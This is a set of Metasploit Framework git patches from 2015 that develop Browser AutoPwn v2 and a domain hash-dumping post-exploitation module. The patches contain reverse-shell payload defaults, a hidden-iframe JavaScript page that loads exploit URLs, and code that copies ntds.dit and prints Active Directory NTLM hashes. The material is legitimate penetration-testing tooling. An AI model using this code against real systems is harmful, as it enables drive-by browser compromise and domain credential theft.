--- a/modules/exploits/multi/browser/autopwn.rb
+++ b/modules/exploits/multi/browser/autopwn.rb
@@ -19,9 +19,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'Author'         => [ 'sinn3r' ],
       'Targets'        => [ [ 'Automatic', {} ] ],
-      'DefaultOptions' => {
-        'DisablePayloadHandler' => true # BAPv2 will set up our own
-      },
       'Platform'       => %w{ java linux osx solaris win android firefox },
       'Privileged'     => false,
       'DisclosureDate' => "Feb 5 2014",
@@ -32,7 +29,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
     register_options(
       [
-        OptEnum.new('Action', [false, 'Action', 'WebServer', ['WebServer','DefangedDetection', 'list'], 'WebServer'])
+        OptEnum.new('Action', [false, 'Action', 'WebServer', ['WebServer','DefangedDetection', 'list'], 'WebServer']),
+        OptRegexp.new('Include', [false, 'Pattern search for specific modules to use'])
       ] ,self.class)
 
     deregister_options('Retries', 'DisablePayloadHandler', 'ContextInformationFile')

From 8cd2d442ff85feda7e9b2d65b1e5f53b7b6e014c Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 7 May 2015 20:54:30 -0500
Subject: [PATCH 0055/1013] Modify show options

---
 lib/msf/core/exploit/browserautopwnv2.rb      | 40 ++++++++++++++-----
 lib/msf/ui/console/command_dispatcher/core.rb |  4 +-
 2 files changed, 34 insertions(+), 10 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 6ac1624a76..44f6f74e5f 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -22,16 +22,21 @@ module Msf
     # The hash key is the name of the platform that matches what's on the module.
     # The loader order is specific.
     DEFAULT_PAYLOADS = {
-      'firefox' => { 'payload' => 'firefox/shell_reverse_tcp',       'lport' => 4449 },
-      'android' => { 'payload' => 'android/meterpreter/reverse_tcp', 'lport' => 4448 },
-      'win'     => { 'payload' => 'windows/meterpreter/reverse_tcp', 'lport' => 4444 },
-      'linux'   => { 'payload' => 'linux/meterpreter/reverse_tcp',   'lport' => 4445 },
-      'osx'     => { 'payload' => 'osx/meterpreter/reverse_tcp',     'lport' => 4446 },
-      'java'    => { 'payload' => 'java/meterpreter/reverse_tcp',    'lport' => 4447 },
-      'generic' => { 'payload' => 'generic/shell_reverse_tcp',       'lport' => 4450 }
+      'firefox' => { 'payload' => 'firefox/shell_reverse_tcp',         'lport' => 4449 },
+      'android' => { 'payload' => 'android/meterpreter/reverse_tcp',   'lport' => 4448 },
+      'win'     => { 'payload' => 'windows/meterpreter/reverse_tcp',   'lport' => 4444 },
+      'linux'   => { 'payload' => 'linux/x86/meterpreter/reverse_tcp', 'lport' => 4445 },
+      'osx'     => { 'payload' => 'osx/x86/shell_reverse_tcp',         'lport' => 4446 },
+      'java'    => { 'payload' => 'java/meterpreter/reverse_tcp',      'lport' => 4447 },
+      'generic' => { 'payload' => 'generic/shell_reverse_tcp',         'lport' => 4450 }
     }
 
 
+    def is_browse_autopwn?
+      true
+    end
+
+
     # Returns all the found exploit modules that support BrowserExploitServer by going through all
     # the exploits from the framework object.
     #
@@ -67,7 +72,7 @@ module Msf
       xploit.datastore['LPORT']   = p['lport']                    # We'll need this information later for multi handler
       xploit.datastore['SSL'] = datastore['SSL']                  # Use SSL or not
       xploit.datastore['SSLVersion'] = datastore['SSLVersion']    # SSL Version
-      xploit.datastore['LHOST'] = datastore['LHOST'] || '0.0.0.0' # Attacker's IP
+      xploit.datastore['LHOST'] = get_payload_lhost               # Attacker's IP
       xploit.datastore['URIPATH'] = "/#{assign_module_resource}"  # A unique resource URI for the exploit
       xploit.datastore['SRVHOST'] = datastore['SRVHOST']          # Exploit's host
       xploit.datastore['MODULEOWNER'] = 'BAP'                     # Let other mixins know we're in BrowserAutoPwn mode
@@ -200,6 +205,11 @@ module Msf
     end
 
 
+    def get_payload_lhost
+      datastore['LHOST'] || Rex::Socket.source_address
+    end
+
+
     # Creates payload listeners.
     #
     # @note INCOMPLETE
@@ -213,7 +223,7 @@ module Msf
         next unless is_payload_handler_wanted?(listener_info['payload'])
 
         multi_handler = framework.modules.create('exploit/multi/handler')
-        multi_handler.datastore['LHOST'] = datastore['LHOST'] || '0.0.0.0'
+        multi_handler.datastore['LHOST'] = get_payload_lhost
         multi_handler.datastore['PAYLOAD'] = get_selected_payload_name(platform)
         multi_handler.datastore['LPORT'] = get_selected_payload_lport(platform)
         multi_handler.datastore['EXITONSESSION'] = false
@@ -352,5 +362,17 @@ module Msf
       print_status("BrowserAutoPwn URL: #{self.get_uri}")
     end
 
+    def show_payloads
+      DEFAULT_PAYLOADS.keys.each do |platform|
+        payload_name = get_selected_payload_name(platform)
+        p = framework.payloads.create(payload_name)
+        p.datastore['LHOST'] = get_payload_lhost
+        p.datastore['LPORT'] = get_selected_payload_lport(platform)
+        next unless p
+        p_opt = Serializer::ReadableText.dump_options(p, '   ')
+        print("\nPayload options (#{payload_name}):\n\n#{p_opt}\n") if (p_opt and p_opt.length > 0)
+      end
+    end
+
   end
 end
diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb
index 7b02741219..41dd2c4e9c 100644
--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -3383,7 +3383,9 @@ class Core
 
     # If it's an exploit and a payload is defined, create it and
     # display the payload's options
-    if (mod.exploit? and mod.datastore['PAYLOAD'])
+    if mod.exploit? and mod.method(:show_payloads)
+      mod.show_payloads
+    elsif (mod.exploit? and mod.datastore['PAYLOAD'])
       p = framework.payloads.create(mod.datastore['PAYLOAD'])
 
       if (!p)

From 8e86a92210ef27d10e534373f5fcad2609314b49 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 8 May 2015 00:25:34 -0500
Subject: [PATCH 0056/1013] Update

---
 lib/msf/core/exploit/browserautopwnv2.rb      |  6 +++---
 lib/msf/core/exploit/http/server.rb           |  4 ++--
 lib/msf/core/exploit/tcp_server.rb            |  4 ++--
 lib/msf/core/handler/reverse_tcp.rb           |  2 +-
 lib/msf/ui/console/command_dispatcher/core.rb | 10 +++++++---
 modules/exploits/multi/handler.rb             |  2 +-
 6 files changed, 16 insertions(+), 12 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 44f6f74e5f..2031755ed0 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -75,7 +75,7 @@ module Msf
       xploit.datastore['LHOST'] = get_payload_lhost               # Attacker's IP
       xploit.datastore['URIPATH'] = "/#{assign_module_resource}"  # A unique resource URI for the exploit
       xploit.datastore['SRVHOST'] = datastore['SRVHOST']          # Exploit's host
-      xploit.datastore['MODULEOWNER'] = 'BAP'                     # Let other mixins know we're in BrowserAutoPwn mode
+      xploit.datastore['MODULEOWNER'] = Msf::Exploit::Remote::BrowserAutopwnv2                     # Let other mixins know we're in BrowserAutoPwn mode
     end
 
 
@@ -228,7 +228,7 @@ module Msf
         multi_handler.datastore['LPORT'] = get_selected_payload_lport(platform)
         multi_handler.datastore['EXITONSESSION'] = false
         multi_handler.datastore['EXITFUNC'] = 'thread'
-        multi_handler.datastore['MODULEOWNER'] = 'BAP'
+        multi_handler.datastore['MODULEOWNER'] = Msf::Exploit::Remote::BrowserAutopwnv2
         multi_handler.exploit_simple(
           'LocalInput' => self.user_input,
           'LocalOutput' => self.user_output,
@@ -305,7 +305,7 @@ module Msf
     # @return [void]
     def setup
       t1 = Time.now
-      self.datastore['MODULEOWNER'] = 'BAP'
+      self.datastore['MODULEOWNER'] = Msf::Exploit::Remote::BrowserAutopwnv2
       self.datastore['DisablePayloadHandler'] = true
       super
       @bap_exploits = []
diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb
index 39dca74d0a..3f27feb488 100644
--- a/lib/msf/core/exploit/http/server.rb
+++ b/lib/msf/core/exploit/http/server.rb
@@ -217,12 +217,12 @@ module Exploit::Remote::HttpServer
       print_status("Intentionally using insecure SSL compression. Your operating system might not respect this!")
     end
 
-    unless datastore['MODULEOWNER'] == 'BAP'
+    unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
       print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
     end
 
 
-    if opts['ServerHost'] == '0.0.0.0' && datastore['MODULEOWNER'] != 'BAP'
+    if opts['ServerHost'] == '0.0.0.0' && datastore['MODULEOWNER'] != Msf::Exploit::Remote::BrowserAutopwnv2
       print_status("Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}")
     end
 
diff --git a/lib/msf/core/exploit/tcp_server.rb b/lib/msf/core/exploit/tcp_server.rb
index 3d53977a14..3744de0782 100644
--- a/lib/msf/core/exploit/tcp_server.rb
+++ b/lib/msf/core/exploit/tcp_server.rb
@@ -47,7 +47,7 @@ module Exploit::Remote::TcpServer
   def exploit
 
     start_service()
-    unless datastore['MODULEOWNER'] == 'BAP'
+    unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
       print_status("Server started.")
     end
 
@@ -71,7 +71,7 @@ module Exploit::Remote::TcpServer
     super
     if(service)
       stop_service()
-      unless datastore['MODULEOWNER'] == 'BAP'
+      unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
         print_status("Server stopped.")
       end
     end
diff --git a/lib/msf/core/handler/reverse_tcp.rb b/lib/msf/core/handler/reverse_tcp.rb
index 8d7dd0454c..cca19fbeb4 100644
--- a/lib/msf/core/handler/reverse_tcp.rb
+++ b/lib/msf/core/handler/reverse_tcp.rb
@@ -108,7 +108,7 @@ module ReverseTcp
         else
           via = ""
         end
-        unless datastore['MODULEOWNER'] == 'BAP'
+        unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
           print_status("Started reverse handler on #{ip}:#{local_port} #{via}")
         end
         break
diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb
index 41dd2c4e9c..6685ab066a 100644
--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -3381,9 +3381,13 @@ class Core
     mod_opt = Serializer::ReadableText.dump_options(mod, '   ')
     print("\nModule options (#{mod.fullname}):\n\n#{mod_opt}\n") if (mod_opt and mod_opt.length > 0)
 
-    # If it's an exploit and a payload is defined, create it and
-    # display the payload's options
-    if mod.exploit? and mod.method(:show_payloads)
+    # We have to special-case browser autopwn because BAP is an exploit module that allows having
+    # multiple payloads, but normally MSF can't do this, so it will have be handled by the BAP
+    # mixin.
+    # For other normal cases, if it's still an exploit and a payload is defined, then just go ahead
+    # create it, and then display the payload options.
+    if mod.exploit? and mod.kind_of?(Msf::Exploit::Remote::BrowserAutopwnv2) and mod.respond_to?(:show_payloads)
+      # #show_payloads should be defined by BrowserAutoPwn
       mod.show_payloads
     elsif (mod.exploit? and mod.datastore['PAYLOAD'])
       p = framework.payloads.create(mod.datastore['PAYLOAD'])
diff --git a/modules/exploits/multi/handler.rb b/modules/exploits/multi/handler.rb
index ef0ee4271b..26cfb0529b 100644
--- a/modules/exploits/multi/handler.rb
+++ b/modules/exploits/multi/handler.rb
@@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     stime = Time.now.to_f
-    unless datastore['MODULEOWNER'] == 'BAP'
+    unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
       print_status "Starting the payload handler..."
     end
     while(true)

From 2e2b536e8f7d5e5b8592d50b6ffd9b1fb7ca1315 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 8 May 2015 00:28:46 -0500
Subject: [PATCH 0057/1013] Update

---
 lib/msf/core/exploit/browserautopwnv2.rb              | 4 ++--
 lib/msf/core/exploit/remote/browser_exploit_server.rb | 8 --------
 2 files changed, 2 insertions(+), 10 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 2031755ed0..d5fe1dfa2e 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -54,7 +54,7 @@ module Msf
           print_status("Failed to load: #{fullname}")
           next
         end
-        if mod.methods.include?(:is_browser_exploit_server?)
+        if mod.kind_of?(Msf::Exploit::Remote::BrowserExploitServer)
           set_exploit_options(mod)
           @bap_exploits << mod
         end
@@ -75,7 +75,7 @@ module Msf
       xploit.datastore['LHOST'] = get_payload_lhost               # Attacker's IP
       xploit.datastore['URIPATH'] = "/#{assign_module_resource}"  # A unique resource URI for the exploit
       xploit.datastore['SRVHOST'] = datastore['SRVHOST']          # Exploit's host
-      xploit.datastore['MODULEOWNER'] = Msf::Exploit::Remote::BrowserAutopwnv2                     # Let other mixins know we're in BrowserAutoPwn mode
+      xploit.datastore['MODULEOWNER'] = Msf::Exploit::Remote::BrowserAutopwnv2 # Let other mixins know we're in BrowserAutoPwn mode
     end
 
 
diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index 723c8d2b47..6e2edcc9f4 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -111,14 +111,6 @@ module Msf
     end
 
 
-    # This allows BrowserAutoPwn's loader to identify which browser exploits are using BES, and
-    # which ones aren't. This is a way to get around the expensive #find_all in order to retrieve
-    # the #ancestors information.
-    def is_browser_exploit_server?
-      true
-    end
-
-
     # Returns the custom 404 URL set by the user
     #
     # @return [String]

From 785a1f4205182bbb86ca2643f60d85a5f7addf92 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 8 May 2015 00:48:04 -0500
Subject: [PATCH 0058/1013] Modify set payload

---
 lib/msf/core/exploit/browserautopwnv2.rb      | 17 +++++++++++++++++
 lib/msf/ui/console/command_dispatcher/core.rb |  7 ++++++-
 2 files changed, 23 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index d5fe1dfa2e..c4538ac4cb 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -374,5 +374,22 @@ module Msf
       end
     end
 
+    def set_payload
+      print_status("'set payload' has been disabled for BrowserAutoPwn.")
+      print_status('You should set a platform-specific payload instead via advanced options:')
+      print_line
+      table = Rex::Ui::Text::Table.new(
+        'Header'  => 'Options',
+        'Indent'  => 1,
+        'Columns' => ['Platform', 'Payload']
+      )
+      DEFAULT_PAYLOADS.each_pair do |platform, payload_info|
+        table << ["PAYLOAD_#{platform}", payload_info['payload']]
+      end
+      print_line(table.to_s)
+      print_status("Example: set PAYLOAD_WIN windows/meterpreter/reverse_tcp")
+      print_status("Please also see 'show advanced' for more options.")
+    end
+
   end
 end
diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb
index 6685ab066a..6e4fade1c0 100644
--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -1996,6 +1996,12 @@ class Core
   # Sets a name to a value in a context aware environment.
   #
   def cmd_set(*args)
+    # Special-case Browser AutoPwn because set payload can only set one payload, but BAP can
+    # do multiple. So let BAP handle this.
+    if args[0] && args[0].upcase == 'PAYLOAD' && active_module.kind_of?(Msf::Exploit::Remote::BrowserAutopwnv2) && active_module.respond_to?(:set_payload)
+      active_module.set_payload
+      return
+    end
 
     # Figure out if these are global variables
     global = false
@@ -2110,7 +2116,6 @@ class Core
   # at least 1 when tab completion has reached this stage since the command itself has been completed
 
   def cmd_set_tabs(str, words)
-
     # A value has already been specified
     return [] if words.length > 2
 

From 2ea5d49902192dbc976b4b17dad9b2bb42437fe7 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 8 May 2015 00:53:25 -0500
Subject: [PATCH 0059/1013] Update set payload description

---
 lib/msf/core/exploit/browserautopwnv2.rb | 10 ++++++----
 1 file changed, 6 insertions(+), 4 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index c4538ac4cb..28128b40ed 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -379,16 +379,18 @@ module Msf
       print_status('You should set a platform-specific payload instead via advanced options:')
       print_line
       table = Rex::Ui::Text::Table.new(
-        'Header'  => 'Options',
+        'Header'  => 'Advanced Options',
         'Indent'  => 1,
-        'Columns' => ['Platform', 'Payload']
+        'Columns' => ['Option Name', 'Description']
       )
       DEFAULT_PAYLOADS.each_pair do |platform, payload_info|
-        table << ["PAYLOAD_#{platform}", payload_info['payload']]
+        table << ["PAYLOAD_#{platform.upcase}", "Payload for #{platform} browser exploits"]
       end
       print_line(table.to_s)
       print_status("Example: set PAYLOAD_WIN windows/meterpreter/reverse_tcp")
-      print_status("Please also see 'show advanced' for more options.")
+      print_line
+      print_status("For a list of payloads, you can do: show payloads")
+      print_status("You can also see 'show advanced' for more options.")
     end
 
   end

From 30b1c508f1d3867f0b4708db4e5ba3110c3b378b Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Sun, 10 May 2015 16:50:32 -0500
Subject: [PATCH 0060/1013] javascript portion

---
 lib/msf/core/exploit/browserautopwnv2.rb  | 60 +++++++++++++++++++++--
 modules/exploits/multi/browser/autopwn.rb |  9 ++--
 2 files changed, 60 insertions(+), 9 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 28128b40ed..518fbe1fd0 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -32,11 +32,6 @@ module Msf
     }
 
 
-    def is_browse_autopwn?
-      true
-    end
-
-
     # Returns all the found exploit modules that support BrowserExploitServer by going through all
     # the exploits from the framework object.
     #
@@ -393,5 +388,60 @@ module Msf
       print_status("You can also see 'show advanced' for more options.")
     end
 
+    def get_exploit_urls
+      urls = []
+
+      bap_exploits.each do |mod|
+        proto = mod.ssl ? 'https' : 'http'
+        host = datastore['URIHOST'] || Rex::Socket.source_address
+        port = datastore['SRVPORT']
+        resource = mod.datastore['URIPATH']
+        url = "#{proto}://#{host}:#{port}#{resource}"
+        urls << url
+      end
+
+      urls
+    end
+
+    # On the fly
+    def build_html
+      js = %Q|
+      var currentIndex = 0;
+      var exploitList = [#{get_exploit_urls.map! {|e| "'#{e}'"} * ", "}];
+
+      window.onload = function() {
+        var e = document.createElement("iframe");
+        e.setAttribute("id", "myiframe");
+        if (typeof e.style.setAttribute == 'undefined') {
+          e.setAttribute("style", "visibility:hidden;height:0;width:0;border:0");
+        } else {
+          e.style.setAttribute("visibility", "hidden");
+          e.style.setAttribute("height", "0");
+          e.style.setAttribute("width", "0");
+          e.style.setAttribute("border", "0");
+        }
+        document.body.appendChild(e);
+        setTimeout("loadExploit(currentIndex)", 1000);
+      }
+
+      function loadExploit(i) {
+        var e = document.getElementById("myiframe");
+        e.setAttribute("src", exploitList[i]);
+        currentIndex += 1;
+      }
+      |
+
+      %Q|<html>
+      <head>
+      <script>
+      #{js}
+      </script>
+      </head>
+      <body>
+      #{datastore['Content']}
+      </body>
+      </html>|
+    end
+
   end
 end
diff --git a/modules/exploits/multi/browser/autopwn.rb b/modules/exploits/multi/browser/autopwn.rb
index a7c457e17f..20c17d9721 100644
--- a/modules/exploits/multi/browser/autopwn.rb
+++ b/modules/exploits/multi/browser/autopwn.rb
@@ -30,7 +30,8 @@ class Metasploit3 < Msf::Exploit::Remote
     register_options(
       [
         OptEnum.new('Action', [false, 'Action', 'WebServer', ['WebServer','DefangedDetection', 'list'], 'WebServer']),
-        OptRegexp.new('Include', [false, 'Pattern search for specific modules to use'])
+        OptRegexp.new('Include', [false, 'Pattern search for specific modules to use']),
+        OptString.new('Content', [false, 'HTML Content', ''])
       ] ,self.class)
 
     deregister_options('Retries', 'DisablePayloadHandler', 'ContextInformationFile')
@@ -57,9 +58,9 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def on_request_exploit(cli, request, target_info)
-    #$stderr.puts get_target.inspect
-    #$stderr.puts find_suitable_exploits(target_info)
-    send_exploit_html(cli, 'OK')
+    serve = build_html
+    print_status("Serving exploits...")
+    send_exploit_html(cli, serve)
   end
 
 

From f3effe5fbb843439cdf52ce571b429e8bda1b5c4 Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Mon, 11 May 2015 11:17:58 -0500
Subject: [PATCH 0061/1013] some minor cleanup

cleanup based on feedback from Kronicdeth

MSP-12357
---
 lib/metasploit/framework/ntds/account.rb      | 90 +++++++------------
 lib/metasploit/framework/ntds/parser.rb       | 12 ++-
 .../post/meterpreter/extensions/priv/priv.rb  |  2 +-
 3 files changed, 38 insertions(+), 66 deletions(-)

diff --git a/lib/metasploit/framework/ntds/account.rb b/lib/metasploit/framework/ntds/account.rb
index 499ea42a65..58179950d6 100644
--- a/lib/metasploit/framework/ntds/account.rb
+++ b/lib/metasploit/framework/ntds/account.rb
@@ -5,73 +5,47 @@ module Metasploit
       # priv extension.
       class Account
 
-        # @!attribute description
-        #   @return [String] The AD Account Description
+        #@return [String] The AD Account Description
         attr_accessor :description
-        # @!attribute disabled
-        #   @return [TrueClass] If the AD account is disabled
-        #   @return [FalseClass] If the AD account is not disabled
+        #@return [Boolean] If the AD account is disabled
         attr_accessor :disabled
-        # @!attribute expired
-        #   @return [TrueClass] If the AD account password is expired
-        #   @return [FalseClass] If the AD account password is not expired
+        #@return [Boolean] If the AD account password is expired
         attr_accessor :expired
-        # @!attribute expiry_date
-        #   @return [String] Human Readable Date for the account's password expiration
+        #@return [String] Human Readable Date for the account's password expiration
         attr_accessor :expiry_date
-        # @!attribute lm_hash
-        #   @return [String] The LM Hash of the current password
+        #@return [String] The LM Hash of the current password
         attr_accessor :lm_hash
-        # @!attribute lm_history
-        #   @return [Array<String>] The LM hashes for previous passwords, up to 24
+        #@return [Array<String>] The LM hashes for previous passwords, up to 24
         attr_accessor :lm_history
-        # @!attribute lm_history_count
-        #   @return [Fixnum] The count of historical LM hashes
+        #@return [Fixnum] The count of historical LM hashes
         attr_accessor :lm_history_count
-        # @!attribute locked
-        #   @return [TrueClass] If the AD account is locked
-        #   @return [FalseClass] If the AD account is not locked
+        #@return [Boolean] If the AD account is locked
         attr_accessor :locked
-        # @!attribute logon_count
-        #   @return [Fixnum] The number of times this account has logged in
+        #@return [Fixnum] The number of times this account has logged in
         attr_accessor :logon_count
-        # @!attribute logon_date
-        #   @return [String] Human Readable Date for the last time the account logged in
+        #@return [String] Human Readable Date for the last time the account logged in
         attr_accessor :logon_date
-        # @!attribute logon_time
-        #   @return [String] Human Readable Time for the last time the account logged in
+        #@return [String] Human Readable Time for the last time the account logged in
         attr_accessor :logon_time
-        # @!attribute name
-        #   @return [String] The samAccountName of the account
+        #@return [String] The samAccountName of the account
         attr_accessor :name
-        # @!attribute no_expire
-        #   @return [TrueClass] If the AD account password does not expire
-        #   @return [FalseClass] If the AD account password does expire
+        #@return [Boolean] If the AD account password does not expire
         attr_accessor :no_expire
-        # @!attribute no_pass
-        #   @return [TrueClass] If the AD account does not require a password
-        #   @return [FalseClass] If the AD account does require a password
+        #@return [Boolean] If the AD account does not require a password
         attr_accessor :no_pass
-        # @!attribute nt_hash
-        #   @return [String] The NT Hash of the current password
+        #@return [String] The NT Hash of the current password
         attr_accessor :nt_hash
-        # @!attribute nt_history
-        #   @return [Array<String>] The NT hashes for previous passwords, up to 24
+        #@return [Array<String>] The NT hashes for previous passwords, up to 24
         attr_accessor :nt_history
-        # @!attribute nt_history_count
-        #   @return [Fixnum] The count of historical NT hashes
+        #@return [Fixnum] The count of historical NT hashes
         attr_accessor :nt_history_count
-        # @!attribute pass_date
-        #   @return [String] Human Readable Date for the last password change
+        #@return [String] Human Readable Date for the last password change
         attr_accessor :pass_date
-        # @!attribute pass_time
-        #   @return [String] Human Readable Time for the last password change
+        #@return [String] Human Readable Time for the last password change
         attr_accessor :pass_time
-        # @!attribute rid
-        #   @return [Fixnum] The Relative ID of the account
+        #@return [Fixnum] The Relative ID of the account
         attr_accessor :rid
-        # @!attribute sid
-        #   @return [String] Byte String for the Account's SID
+        #@return [String] Byte String for the Account's SID
         attr_accessor :sid
 
         # @param raw_data [String] the raw 3948 byte string from the wire
@@ -105,17 +79,17 @@ module Metasploit
 
         # @return [String] String representation of the account data
         def to_s
-          <<EOS
-#{@name} (#{@description})
-#{ntlm_hash}
-Password Expires: #{@expiry_date}
-Last Password Change: #{@pass_time} #{@pass_date}
-Last Logon: #{@logon_time} #{@logon_date}
-Logon Count: #{@logon_count}
-#{uac_string}
-Hash History:
-#{hash_history}
-EOS
+          <<-EOS.strip_heredoc
+          #{@name} (#{@description})
+          #{ntlm_hash}
+          Password Expires: #{@expiry_date}
+          Last Password Change: #{@pass_time} #{@pass_date}
+          Last Logon: #{@logon_time} #{@logon_date}
+          Logon Count: #{@logon_count}
+          #{uac_string}
+          Hash History:
+          #{hash_history}
+          EOS
         end
 
         # @return [String] the NTLM hash string for the current password
diff --git a/lib/metasploit/framework/ntds/parser.rb b/lib/metasploit/framework/ntds/parser.rb
index 2a866cc55e..80fa1792cd 100644
--- a/lib/metasploit/framework/ntds/parser.rb
+++ b/lib/metasploit/framework/ntds/parser.rb
@@ -11,14 +11,11 @@ module Metasploit
         # The size, in Bytes, of a batch of NTDS accounts
         BATCH_SIZE = 78960
 
-        # @!attribute channel
-        #   @return [Rex::Post::Meterpreter::Channels::Pool] The Meterpreter NTDS Parser Channel
+        #@return [Rex::Post::Meterpreter::Channels::Pool] The Meterpreter NTDS Parser Channel
         attr_accessor :channel
-        # @!attribute client
-        #   @return [Msf::Session] The Meterpreter Client
+        #@return [Msf::Session] The Meterpreter Client
         attr_accessor :client
-        # @!attribute file_path
-        #   @return [String] The path to the NTDS.dit file on the remote system
+        #@return [String] The path to the NTDS.dit file on the remote system
         attr_accessor :file_path
 
         def initialize(client, file_path='')
@@ -31,8 +28,9 @@ module Metasploit
         # Yields a [Metasploit::Framework::NTDS::Account] for each account found
         # in the remote NTDS.dit file.
         #
+        # @yield [account]
         # @yieldparam account [Metasploit::Framework::NTDS::Account] an AD user account
-        # @return [void] does not return a value
+        # @yieldreturn [void] does not return a value
          def each_account
            raw_batch_data = pull_batch
            until raw_batch_data.nil?
diff --git a/lib/rex/post/meterpreter/extensions/priv/priv.rb b/lib/rex/post/meterpreter/extensions/priv/priv.rb
index 175bd13c7b..12bed0d606 100644
--- a/lib/rex/post/meterpreter/extensions/priv/priv.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/priv.rb
@@ -103,7 +103,7 @@ class Priv < Extension
     if channel_id.nil?
       raise Exception, "We did not get a channel back!"
     end
-    channel = Rex::Post::Meterpreter::Channels::Pool.new(client, channel_id, "priv_ntds", CHANNEL_FLAG_SYNCHRONOUS)
+    Rex::Post::Meterpreter::Channels::Pool.new(client, channel_id, "priv_ntds", CHANNEL_FLAG_SYNCHRONOUS)
   end
 
   #

From 21004046c1e3114c58d13b12671501cd3766f1f8 Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Mon, 11 May 2015 14:48:12 -0500
Subject: [PATCH 0062/1013] begin parsing of the database

clean up and begin aprsing the database
after we have copied it

MSP-12358
---
 .../windows/gather/credentials/domain_hashdump.rb | 15 +++++++++++++++
 1 file changed, 15 insertions(+)

diff --git a/modules/post/windows/gather/credentials/domain_hashdump.rb b/modules/post/windows/gather/credentials/domain_hashdump.rb
index 908088c96c..45783d8257 100644
--- a/modules/post/windows/gather/credentials/domain_hashdump.rb
+++ b/modules/post/windows/gather/credentials/domain_hashdump.rb
@@ -6,6 +6,7 @@
 require 'msf/core'
 require 'rex'
 require 'msf/core/auxiliary/report'
+require 'metasploit/framework/ntds/parser'
 
 class Metasploit3 < Msf::Post
   include Msf::Post::Windows::Registry
@@ -32,6 +33,14 @@ class Metasploit3 < Msf::Post
   def run
     if preconditions_met?
       ntds_file = copy_database_file
+      unless ntds_file.nil?
+        print_status "Repairing NTDS database after copy..."
+        print_status repair_ntds(ntds_file)
+        ntds_parser = Metasploit::Framework::NTDS::Parser.new(client, ntds_file)
+        ntds_parser.each_account do |ad_account|
+          print_good ad_account.to_s
+        end
+      end
     end
   end
 
@@ -65,6 +74,7 @@ class Metasploit3 < Msf::Post
     result = cmd_exec("ntdsutil.exe", command_arguments)
     if result.include? "IFM media created successfully"
       file_path = "#{tmp_path}\\Active Directory\\ntds.dit"
+      print_status "NTDS database copied to #{file_path}"
     else
       print_error "There was an error copying the ntds.dit file!"
       file_path = nil
@@ -94,6 +104,11 @@ class Metasploit3 < Msf::Post
     return status
   end
 
+  def repair_ntds(path='')
+    arguments = "/p /o \"#{path}\""
+    cmd_exec("esentutl", arguments)
+  end
+
   def vss_method
 
   end

